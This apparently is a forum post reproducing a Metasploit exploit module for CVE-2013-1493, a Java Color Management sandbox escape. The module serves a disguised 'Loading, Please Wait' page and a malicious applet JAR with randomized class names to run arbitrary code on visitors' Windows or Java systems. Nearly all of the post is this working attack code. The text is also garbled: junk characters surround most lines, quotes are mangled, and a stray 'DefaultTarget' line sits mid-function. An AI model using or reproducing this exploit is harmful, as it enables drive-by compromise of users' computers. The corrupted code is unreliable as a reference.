##
- I0 s6 M8 u. B+ D) }6 }( c( ~; D1 X' X6 t' ?4 `' s
# This file is part of the Metasploit Framework and may be subject to
# j4 h3 c! D9 s% N5 a3 c5 c# redistribution and commercial restrictions. Please see the Metasploit
! f; Y0 Z/ v" ~) K# web site for more information on licensing and terms of use.
0 B c! Q: v& }6 Z" R# http://metasploit.com/
* L& V K2 X5 i/ n& ?##
2 ]: _' Q% j; M9 K8 P) c5 d& C0 Crequire ‘msf/core’! u2 p( M9 _! m% j0 y- F
require ‘rex’
+ C. `# g9 Q$ S9 K' Yclass Metasploit3 < Msf::Exploit::Remote6 j4 F4 x$ m- d( e. T) X: v: e ]
Rank = NormalRanking. _0 O6 D7 g& N2 s ^3 _* ]
include Msf::Exploit::Remote::HttpServer::HTML% M, ]$ }' x) g: k
include Msf::Exploit::EXE
6 X$ T' I3 q' \+ Iinclude Msf::Exploit::Remote::BrowserAutopwn" ?9 m. r8 I5 O! |6 o! q4 l8 i8 R' t' @ z
autopwn_info({ :javascript => false })
7 W/ K, g/ F Edef initialize( info = {} ). s0 M6 U u6 _* a9 _" }
super( update_info( info,
; b3 z" b+ v# Z. W! C‘Name’ => ‘Java CMM Remote Code Execution’,
, m: \5 x# j9 V. R‘Description’ => %q{2 g; `9 v: [* L
This module abuses the Color Management classes from a Java Applet to run
. t9 g5 L0 P% b" o1 }# T7 e; R0 ^9 Narbitrary Java code outside of the sandbox as exploited in the wild in February
5 e; F% y, K7 p$ uand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
6 m" S6 R# F& band earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
; w2 }2 ~: y/ {' x G2 R5 p, Z' gsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java. `9 A" c8 \ h3 |1 y% Z
warning in order to run the malicious applet.! Y6 I+ b8 I% ~+ f
},9 k4 j3 i9 s. H9 M0 l
‘License’ => MSF_LICENSE,
% G Z2 R* p1 h- y‘Author’ =>1 k3 S1 I7 @% c" E8 g* z
'Unknown', # Vulnerability discovery and Exploit9 y1 a) u. s6 r
'juan vazquez' # Metasploit module (just ported the published exploit)
$ q7 J, S T- v9 B; B],
. ], x! y8 X: v7 G‘References’ =>9 y6 U8 k8 [/ z
[2 @* }" K/ ^ p
[ 'CVE', '2013-1493' ],
/ I3 v3 P% u! m2 u7 z[ 'OSVDB', '90737' ],: H- o3 n% N) a0 r2 y5 K0 S) Y
[ 'BID', '58238' ],$ r7 l1 Q7 f! S* N, f+ O+ V
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],0 k% y( `8 d. |) X
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ]," _2 q! y$ O& T% y( o
[ 'URL', 'http://pastie.org/pastes/6581034' ]
: y$ M# e3 p8 _; L/ y3 o& C5 Z], Y4 ]8 r& k" m& T/ ~
‘Platform’ => [ 'win', 'java' ],8 O0 j& h# S& S( a, R
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },+ B: L2 T* s) l- w0 ^7 u9 z" c
‘Targets’ =>
+ E$ N- U* w8 U4 M+ Z[
$ C* w/ c, M/ p* Q$ P[ 'Generic (Java Payload)',; ?. X$ O0 h/ ` Y: x
{+ X- |- z0 |* o$ C% G& y
'Platform' => 'java',! `, U# R0 `$ w) N: |& u
'Arch' => ARCH_JAVA3 F1 |/ {* i1 [4 U. V1 N
}: U4 @5 c" u0 S* W9 a% E
],
' M% V4 {4 s/ L& }6 Z$ k, c8 \[ 'Windows x86 (Native Payload)',; M8 I t8 G, m R0 K s3 U/ n
{
; ^* [: ?# x3 Q# J9 T/ m# p# l'Platform' => 'win',
3 o/ M; q6 C$ }' Y' l'Arch' => ARCH_X86' f) J2 Y ~6 v* K4 U8 [9 T- w' @, m
}
8 Z% j) [0 B2 p6 H5 _) S]
% D* H% ~ M3 U! ~],' a- I2 f: d9 j! J* k) D
‘‘DisclosureDate’ => ‘Mar 01 2013′
! Y7 N. Z! A) l8 S9 c)) t% S! ?9 U% N
end# N5 `; S/ R) r5 Y! \
def setup( i: h% O- h/ m6 G6 W) G
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
% x2 p" O# E: T/ {+ V4 _% m@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
( p1 R1 A# F/ @: u% S) Upath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”) V2 H9 |4 M( c* a
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
! v: v- i# F( R" Lpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)$ S) p1 Y* s" C' E$ \
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
3 k! h/ L5 \6 A+ L8 R9 W; Y8 Cpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)+ U x) E$ X% L) g' z1 g
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
3 o) q" e0 q5 d1 `/ M@init_class_name = rand_text_alpha(“Init”.length); g8 w+ V v/ A* B9 K. G
@init_class.gsub!(“Init”, @init_class_name)* T( t; s# _0 T
super) U' s5 B! q' S& G% x9 @ u1 ?( C8 O
end
2 ]; Z, g- e& c5 o, Ydef on_request_uri(cli, request)
# J! O1 b9 Y% n/ n/ Tprint_status(“handling request for #{request.uri}”)+ { K' a; M0 x9 Q( G& L+ u8 d
case request.uri0 V9 s3 m7 c9 }8 e; {( B
when /\.jar$/i
& T% g2 T* V1 E, }! G+ R. Yjar = payload.encoded_jar
0 r: O1 Y0 c; R, Z. S9 H! ?jar.add_file(“#{@init_class_name}.class”, @init_class)0 B; c# t6 Z+ `6 E m$ D7 o
jar.add_file(“Leak.class”, @leak_class)" g" i' K! D4 M) N0 y- _, C6 L
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)! _) K# C8 g% V8 a7 L
jar.add_file(“MyColorSpace.class”, @color_space_class)" h- }$ R5 s+ A6 [8 n. X
DefaultTarget’ => 1,
) @) E# j2 y# @, A$ W* Bmetasploit_str = rand_text_alpha(“metasploit”.length)7 U# {& b' N$ i! ?+ c
payload_str = rand_text_alpha(“payload”.length)
$ t |: J& {1 q1 H# jjar.entries.each { |entry|4 p4 [' Y, |6 H6 ~/ Y
entry.name.gsub!(“metasploit”, metasploit_str): ~3 H% y f) ^4 F
entry.name.gsub!(“Payload”, payload_str)
- N3 W* r$ r6 q8 |3 U+ G! pentry.data = entry.data.gsub(“metasploit”, metasploit_str)
# E2 o" l- j8 C- Wentry.data = entry.data.gsub(“Payload”, payload_str)8 j# d$ J( V6 T5 U9 `8 v- |# E
}
$ w. ?" t, H. ^6 \/ d% Ujar.build_manifest1 {+ N% H1 i2 x) \, K3 D
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
N. h. K8 a* Xwhen /\/$/
0 t- A. D8 I' b3 y) z Upayload = regenerate_payload(cli)0 Q) c) i( a/ d# m
if not payload
% k+ z' l8 w$ |6 xprint_error(“Failed to generate the payload.”); v' R$ f- |: Q; c7 J. v
send_not_found(cli)! ]" w% p+ t' b; l( F5 L" s
return
) }& N9 Q! \, z" T1 z e& Bend- z# x# l! V2 q
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })
( n) r% ~4 [" _/ ]6 f1 P/ ~else0 X7 q! J1 r! [! S6 H/ M4 \
send_redirect(cli, get_resource() + ‘/’, ”)$ G; e: T ^% Y
end- U9 q7 a" h2 F3 B5 _% S8 n
end5 w3 D7 K! x$ o$ u' }
def generate_html6 J6 N0 w7 U3 T0 Q" n8 I7 [! @
html = %Q|<html><head><title>Loading, Please Wait…</title></head>|% `6 ~/ R% Z: ^* l5 A) y g$ M
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|
! x) o% Y! S7 ^' u4 Phtml += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
, p' p! c' ^! k+ ^4 q( e2 ^html += %Q|</applet></body></html>|
8 l! \$ z( _" f2 C% r5 L$ Treturn html
& w% A7 @7 T) x, xend
' i8 Y8 w! C8 U' y0 p/ f X& ]end
9 R" i0 K$ f- _1 S/ e0 r/ d+ i! Cend! ?- ^/ a s1 b
|
发表于 2013-4-4 17:31:17
收藏
支持
反对